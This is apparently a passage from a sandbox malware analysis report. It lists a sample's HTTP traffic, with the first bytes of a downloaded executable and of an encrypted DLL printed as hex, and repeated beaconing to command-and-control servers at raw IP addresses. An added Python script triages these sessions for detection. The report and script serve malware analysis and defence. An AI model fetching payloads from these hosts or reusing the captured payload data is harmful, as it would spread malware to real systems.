                                                      Oct 3, 2022 17:29:59.949419975 CEST | 258 | OUT | GET /software.php HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: E
                                                      Host: 85.31.46.167
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:29:59.982002974 CEST | 259 | IN | HTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:29:59 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Pragma: public
                                                      Expires: 0
                                                      Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                      Cache-Control: private
                                                      Content-Disposition: attachment; filename="soft";
                                                      Content-Transfer-Encoding: binary
                                                      Content-Length: 3947920
                                                      Keep-Alive: timeout=5, max=99
                                                      Connection: Keep-Alive
                                                      Content-Type: application/octet-stream
                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f1 9a e4 ea 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 e4 14 00 00 0c 00 00 00 00 00 00 a6 02 15 00 00 20 00 00 00 20 15 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 15 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 02 15 00 4f 00 00 00 00 20 15 00 32 09 00 00 00 00 00 00 00 00 00 00 00 28 3c 00 90 15 00 00 00 40 15 00 0c 00 00 00 38 02 15 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac e2 14 00 00 20 00 00 00 e4 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 32 09 00 00 00 20 15 00 00 0a 00 00 00 e6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 15 00 00 02 00 00 00 f0 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 02 15 00 00 00 00 00 48 00 00 00 02 00 05 00 68 81 00 00 40 45 00 00 01 00 00 00 54 00 00 06 a8 c6 00 00 90 3b 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 
04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 3d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 4d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 b7 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 d9 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 eb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 1f 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2a 1e 02 28 18 00 00 0a 2a 56 73 0e 00 00 06 28 19 00 00
                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL"0 @ ``TO 2(<@8 H.text `.rsrc2 @@.reloc@@BHh@ET;(*(*~-rp(os~*~**j(r=p~ot*j(rMp~ot*j(rp~ot*j(rp~ot*j(rp~ot*j(rp~ot*j(rp~ot*~*(*Vs(


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                      3 | 192.168.2.5 | 49698 | 208.67.104.97 | 80 | C:\Users\user\Desktop\file.exe
                                                      Timestamp | kBytes transferred | Direction | Data
                                                      Oct 3, 2022 17:30:23.099719048 CEST | 4457 | OUT | GET /powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixinte HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: 1
                                                      Host: 208.67.104.97
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:30:24.871246099 CEST | 4458 | IN | HTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:30:23 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                      4 | 192.168.2.5 | 49699 | 107.182.129.235 | 80 | C:\Users\user\Desktop\file.exe
                                                      Timestamp | kBytes transferred | Direction | Data
                                                      Oct 3, 2022 17:30:25.035912037 CEST | 4458 | OUT | GET /storage/ping.php HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: 0
                                                      Host: 107.182.129.235
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:30:25.063242912 CEST | 4459 | IN | HTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:30:25 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Content-Length: 17
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 55 77 55 6f 6f 6f 49 49 72 77 67 68 32 34 75 75 55
                                                      Data Ascii: UwUoooIIrwgh24uuU
                                                      Oct 3, 2022 17:30:25.112026930 CEST | 4459 | OUT | GET /storage/extension.php HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: 1
                                                      Host: 107.182.129.235
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:30:25.139234066 CEST | 4461 | IN | HTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:30:25 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Pragma: public
                                                      Expires: 0
                                                      Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                      Cache-Control: private
                                                      Content-Disposition: attachment; filename="fuckingdllENCR.dll";
                                                      Content-Transfer-Encoding: binary
                                                      Content-Length: 94224
                                                      Keep-Alive: timeout=5, max=99
                                                      Connection: Keep-Alive
                                                      Content-Type: application/octet-stream
                                                      Data Raw: f9 f1 a9 b8 8b 6d 69 b2 02 e6 7d 3b a6 18 dc 46 22 cd 29 c1 54 8d 11 27 4b 3b 1b ff ec e2 4f bb 59 30 3a cd fb c8 c6 19 33 6a e8 b1 5c 17 49 6a ea 32 52 c5 89 50 17 fc 06 dd 43 07 19 e2 71 a9 7c d1 32 a8 0e fe be ec b3 69 52 32 57 f5 46 e8 b4 ab 43 3d 4d 55 b9 a4 16 cb 8b 9e 85 48 36 99 ea f5 41 e4 94 1a 97 d3 d7 40 7f fa 4f a6 63 1a 89 89 4d 87 78 38 ce 94 d2 e4 b0 4c ae e0 2d 20 c9 88 ab 62 96 84 7c 12 43 b2 c0 e7 8e a4 5a 7d a5 77 d7 94 2e d1 6c 1a 61 cd 61 54 b4 87 c2 a5 62 72 2c 19 c8 18 36 77 23 06 6a c2 50 d9 8c 6c 69 f4 88 3d fc b4 ca 1b 0e c0 6f ac 1e b2 92 93 cf ee 53 e9 7b ab eb 52 94 a4 e6 e4 2e 94 d9 d2 35 d5 a0 15 92 ec a7 23 3b 93 d0 94 82 04 2d fb d3 f1 e8 62 2b 19 e3 8b 47 28 90 3e cb 02 51 05 b9 e0 f5 a5 69 4e 7b 90 2b 79 0c 1d d0 5a 43 e7 ae 7a 33 73 45 cd f0 ae fa 54 0d d3 32 df 4a 10 84 ce 33 bf 39 55 d6 34 26 f6 b2 50 d4 e5 c7 c7 cb d7 b0 e1 89 22 77 49 fa a4 b9 cb e0 40 cb c3 b5 ae da 78 25 3e 90 be 44 0e d5 80 27 7a 09 5e fb 01 d3 d4 5e 28 bc 07 0d a4 87 4e 43 ca 5b 5b 6b d9 0a ba c8 f0 ff 95 eb ca 9c d2 56 5d 47 f1 d2 29 65 0f 7f b4 94 bf 60 c5 c5 d4 ea b1 07 18 ee 4b 2f 4c d0 55 6c 12 19 46 1f 15 22 8a ed 38 24 16 41 64 ef fa aa e4 3a 69 b5 67 a6 f4 30 81 64 db 0f d8 5b 2e a9 cf 54 22 6c 90 55 c0 4d 00 3d 17 30 b1 b0 ef 2c de d9 2c e7 99 83 6b 75 d4 57 2c c3 d1 f7 f9 f3 37 60 51 cf 46 69 3d 77 13 f9 e3 75 f1 dc 3a 8f 97 51 2d ca 52 a0 7d 30 1c c8 eb ac 4c ba ad 82 8f bd 6e c9 0a 1c 74 a4 6e 76 c0 1f eb 06 07 7a c3 c0 18 0c 65 9e e8 49 c0 43 00 01 b3 b6 d2 39 bf 56 8c 7e 31 2b 5b 5d 06 cb 9f 37 f5 04 af 78 51 1d e7 a4 f8 12 02 f6 b0 06 24 81 4c 00 1c 6f e9 65 51 c7 86 2f c8 62 c9 82 f8 5a 96 0c e4 de c1 e4 70 5d 96 3b 69 2a 29 d1 a6 bd 96 23 b9 62 ef 14 f0 25 31 95 ea 11 0d 8c db bf ec f8 40 a0 17 82 47 ff e1 5b 02 97 d9 b7 9b a6 85 0d 2f 00 63 ca 8e 5a 19 f7 ea 08 d1 81 f4 47 95 3a 0f a1 6e 90 a8 45 d3 69 08 4f af 9c 6f af 55 1e 42 c9 50 78 d3 de b2 de 0b 31 7b 2c 61 10 da cf 
f3 f6 23 6b cd ad 64 6a be ed 4c 34 cc 0f d2 7d da 64 3c 95 14 a4 a8 d5 d9 49 79 79 c4 a0 4a a7 fb 66 ee 57 c4 10 2c 5e 76 56 da 41 6f d4 4b d4 22 2b 4f 58 38 21 46 a7 02 f1 59 50 8b ea bd f5 75 b6 2d e6 ed 42 69 6b eb a5 5b e2 75 05 9b c1 26 57 74 bc 84 50 af f4 7f 6d cf 00 10 8e 5e 20 c8 9a c9 6b 7e e2 01 2e a3 90 6c fe d3 6f a6 7a 4d 56 1c 21 73 2e ed b6 68 80 f0 c3 7b 0f 6e 32 3b 7a d7 d9 cc 4b db 04 3f 53 c5 93 f4 2d 96 0d f9 65 57 e0 e0 ac cf 63 dc fa f2 1b e6 2d 56 dd 62 67 ff ff 39 da 49 c5 05 67 ba 78 fa 67 cb b7 ba ef 7d c3 27 e6 35 d2 c0 28 2a 50 b3 e8 b7 93 c8 4a 23 97 18 3a b5 49 53 b4 08 44 7d 8e 76 8a 97 c3 09 ea 9d 15 6a 4b 39 03 4c 51 46 aa 0f 00
                                                      Data Ascii: mi};F")T'K;OY0:3j\Ij2RPCq|2iR2WFC=MUH6A@OcMx8L- b|CZ}w.laaTbr,6w#jPli=oS{R.5#;-b+G(>QiN{+yZCz3sET2J39U4&P"wI@x%>D'z^^(NC[[kV]G)e`K/LUlF"8$Ad:ig0d[.T"lUM=0,,kuW,7`QFi=wu:Q-R}0LntnvzeIC9V~1+[]7xQ$LoeQ/bZp];i*)#b%1@G[/cZG:nEiOoUBPx1{,a#kdjL4}d<IyyJfW,^vVAoK"+OX8!FYPu-Bik[u&WtPm^ k~.lozMV!s.h{n2;zK?S-eWc-Vbg9Igxg}'5(*PJ#:ISD}vjK9LQF
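The sessions on this page share traits that a proxy or IDS can key on: one-character User-Agent values ("D", "E", "0", "1", "2") where a browser sends a product string, downloads served as application/octet-stream whose bodies open with the MZ DOS header, an attachment named fuckingdllENCR.dll whose first bytes show no PE structure at all, and, in the session that follows, GET /library.php repeated roughly every 2.6 seconds. The script below is an added example, not part of the Joe Sandbox report or of the sample. The exchanges it triages are transcribed from the capture on this page (timestamps, hosts, paths, User-Agent and response headers, the first 64 bytes of each download body); the thresholds (User-Agent length, entropy cut-off, beacon count and jitter) are assumptions chosen to separate this traffic from ordinary browsing, not values taken from the report.

```python
# Added example: triage of the HTTP sessions captured in this report.
# Exchanges are transcribed from the page; thresholds are assumptions.
from __future__ import annotations

import math
from collections import Counter, defaultdict
from dataclasses import dataclass
from datetime import datetime
from statistics import median

MAX_COUNTER_UA = 2     # assumed: browsers never send a 1-2 character User-Agent
HIGH_ENTROPY = 5.0     # assumed: bits/byte over a 64-byte prefix that marks ciphertext
MIN_BEACON_HITS = 5    # assumed: repeats of one host+path before calling it a beacon
BEACON_JITTER = 0.5    # assumed: every gap must lie within 50% of the median gap


@dataclass
class Exchange:
    ts: datetime
    host: str
    path: str
    user_agent: str
    content_type: str
    content_disposition: str
    body_prefix: bytes          # first bytes of the response body


def parse_ts(s: str) -> datetime:
    """Parse the sandbox form 'Oct 3, 2022 17:30:25.350914955 CEST'. datetime holds
    microseconds only, so the nanosecond digits are cut; the zone suffix is dropped."""
    s = s.rsplit(" ", 1)[0]
    head, frac = s.rsplit(".", 1)
    return datetime.strptime(f"{head}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: a zero-padded DOS header scores about 1.1, 64 bytes of
    ciphertext score close to the 6.0 ceiling for that length."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


# First 64 bytes of the bodies on this page: the e_lfanew=0x80 DOS header shared by
# both software.php downloads, and the opening bytes of fuckingdllENCR.dll.
DOS_HEADER = bytes.fromhex(
    "4d5a90000300000004000000ffff0000b8000000000000004000000000000000"
    + "00" * 28 + "80000000")
ENCR_PREFIX = bytes.fromhex(
    "f9f1a9b88b6d69b202e67d3ba618dc4622cd29c1548d11274b3b1bffece24fbb"
    "59303acdfbc8c619336ae8b15c17496aea3252c5895017fc06dd430719e271a9")


def ex(ts, host, path, ua, ctype="text/html; charset=UTF-8", cdisp="", body=b"0"):
    return Exchange(parse_ts(ts), host, path, ua, ctype, cdisp, body)


EXCHANGES = [
    ex("Oct 3, 2022 17:29:59.693042994 CEST", "85.31.46.167", "/software.php", "D",
       "application/octet-stream", 'attachment; filename="dll";', DOS_HEADER),
    ex("Oct 3, 2022 17:29:59.949419975 CEST", "85.31.46.167", "/software.php", "E",
       "application/octet-stream", 'attachment; filename="soft";', DOS_HEADER),
    ex("Oct 3, 2022 17:30:23.099719048 CEST", "208.67.104.97",
       "/powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixinte", "1"),
    ex("Oct 3, 2022 17:30:25.035912037 CEST", "107.182.129.235", "/storage/ping.php", "0",
       body=b"UwUoooIIrwgh24uuU"),
    ex("Oct 3, 2022 17:30:25.112026930 CEST", "107.182.129.235", "/storage/extension.php",
       "1", "application/octet-stream", 'attachment; filename="fuckingdllENCR.dll";',
       ENCR_PREFIX),
] + [ex(t, "171.22.30.106", "/library.php", "2") for t in (
    "Oct 3, 2022 17:30:25.350914955 CEST", "Oct 3, 2022 17:30:27.926572084 CEST",
    "Oct 3, 2022 17:30:30.576231003 CEST", "Oct 3, 2022 17:30:33.219202042 CEST",
    "Oct 3, 2022 17:30:35.788949013 CEST", "Oct 3, 2022 17:30:38.376482010 CEST",
    "Oct 3, 2022 17:30:40.959604979 CEST", "Oct 3, 2022 17:30:44.292083025 CEST",
    "Oct 3, 2022 17:30:46.860872984 CEST", "Oct 3, 2022 17:30:49.499805927 CEST")]


def classify_body(e: Exchange) -> str:
    """Return pe-executable, opaque-high-entropy, opaque or text."""
    if e.body_prefix.startswith(b"MZ"):
        return "pe-executable"
    if "attachment" in e.content_disposition or e.content_type == "application/octet-stream":
        return "opaque-high-entropy" if shannon_entropy(e.body_prefix) >= HIGH_ENTROPY else "opaque"
    return "text"


def triage(exchanges: list[Exchange]) -> list[str]:
    """Per-exchange findings: counter-style User-Agent, PE or encrypted payload delivery."""
    findings = []
    for e in exchanges:
        where = f"{e.host}{e.path}"
        if len(e.user_agent) <= MAX_COUNTER_UA:
            findings.append(f"{where}: User-Agent {e.user_agent!r} is a counter, not a browser string")
        kind = classify_body(e)
        if kind == "pe-executable":
            findings.append(f"{where}: PE file delivered as {e.content_disposition or e.content_type}")
        elif kind == "opaque-high-entropy":
            findings.append(f"{where}: high-entropy attachment, likely an encrypted payload")
    return findings


def beacons(exchanges: list[Exchange]) -> dict[tuple[str, str], float]:
    """host+path pairs polled at a steady interval, mapped to the median gap in seconds."""
    by_target = defaultdict(list)
    for e in exchanges:
        by_target[(e.host, e.path)].append(e.ts)
    found = {}
    for target, stamps in by_target.items():
        if len(stamps) < MIN_BEACON_HITS:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        m = median(gaps)
        if m > 0 and all(abs(g - m) <= BEACON_JITTER * m for g in gaps):
            found[target] = round(m, 2)
    return found


if __name__ == "__main__":
    print(*triage(EXCHANGES), sep="\n")
    for (host, path), gap in beacons(EXCHANGES).items():
        print(f"beacon: {host}{path} every ~{gap}s")
```

The MZ check is deliberately applied to the body rather than to Content-Type or the attachment filename: "dll" and "soft" carry no extension and octet-stream is exactly what a legitimate file server would send, so content inspection is the only reliable signal. The entropy test separates the two software.php payloads, which begin with the familiar zero-padded DOS stub, from extension.php, whose first 64 bytes look like ciphertext; that matches the "ENCR" in the filename and explains why the dropped DLL is only recognisable after the sample decrypts it. The beacon detector groups by host and path and tolerates the one 3.3 second gap in the library.php series because it sits within 50% of the median.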


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                      5 | 192.168.2.5 | 49700 | 171.22.30.106 | 80 | C:\Users\user\Desktop\file.exe
                                                      Timestamp | kBytes transferred | Direction | Data
                                                      Oct 3, 2022 17:30:25.350914955 CEST | 4560 | OUT | GET /library.php HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: 2
                                                      Host: 171.22.30.106
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:30:25.879477978 CEST | 4560 | IN | HTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:30:25 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0
                                                      Oct 3, 2022 17:30:27.926572084 CEST | 4560 | OUT | GET /library.php HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: 2
                                                      Host: 171.22.30.106
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:30:28.510983944 CEST | 4561 | IN | HTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:30:27 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=99
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0
                                                      Oct 3, 2022 17:30:30.576231003 CEST | 4561 | OUT | GET /library.php HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: 2
                                                      Host: 171.22.30.106
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:30:31.119661093 CEST | 4562 | IN | HTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:30:30 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=98
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0
                                                      Oct 3, 2022 17:30:33.219202042 CEST | 4562 | OUT | GET /library.php HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: 2
                                                      Host: 171.22.30.106
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:30:33.738348961 CEST | 4562 | IN | HTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:30:33 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=97
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0
                                                      Oct 3, 2022 17:30:35.788949013 CEST | 4563 | OUT | GET /library.php HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: 2
                                                      Host: 171.22.30.106
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:30:36.318706989 CEST | 4563 | IN | HTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:30:35 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=96
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0
                                                      Oct 3, 2022 17:30:38.376482010 CEST | 4564 | OUT | GET /library.php HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: 2
                                                      Host: 171.22.30.106
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:30:38.896092892 CEST | 4564 | IN | HTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:30:38 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=95
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0
                                                      Oct 3, 2022 17:30:40.959604979 CEST | 4565 | OUT | GET /library.php HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: 2
                                                      Host: 171.22.30.106
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:30:41.482295990 CEST | 4565 | IN | HTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:30:40 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=94
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0
                                                      Oct 3, 2022 17:30:44.292083025 CEST | 4565 | OUT | GET /library.php HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: 2
                                                      Host: 171.22.30.106
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:30:44.814677000 CEST | 4566 | IN | HTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:30:44 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=93
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0
                                                      Oct 3, 2022 17:30:46.860872984 CEST | 4566 | OUT | GET /library.php HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: 2
                                                      Host: 171.22.30.106
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:30:47.460123062 CEST | 4571 | IN | HTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:30:46 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=92
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0
                                                      Oct 3, 2022 17:30:49.499805927 CEST | 4573 | OUT | GET /library.php HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: 2
                                                      Host: 171.22.30.106
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:30:50.041088104 CEST | 4573 | IN | HTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:30:49 GMT
